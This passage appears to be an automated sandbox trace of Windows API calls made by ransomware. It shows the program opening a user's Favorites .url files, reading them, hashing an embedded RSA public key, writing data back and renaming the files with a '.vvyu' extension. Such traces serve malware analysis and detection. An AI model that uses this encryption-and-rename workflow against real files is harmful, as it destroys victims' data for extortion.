hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.823] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.823] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.823] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.823] CloseHandle (hObject=0x584) returned 1 [0194.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0194.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.825] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url.vvyu")) returned 1 [0194.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.827] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.829] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0194.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0194.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.830] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0194.830] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.831] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.831] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.833] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.833] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.834] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.834] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.835] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.836] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.836] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.836] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.836] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.836] GetLastError () returned 0x0 [0194.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.836] GetLastError () returned 0x0 [0194.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.837] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.837] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.837] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.837] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.837] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.838] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae23c8 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2380 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0194.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae63b0 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0194.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.841] GetCurrentThreadId () returned 0x5d8 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7f98 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.842] GetCurrentThreadId () returned 0x5d8 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0194.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2380 | out: hHeap=0x2c0000) returned 1 [0194.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.852] HeapFree (in: hHeap=0x2c0000, 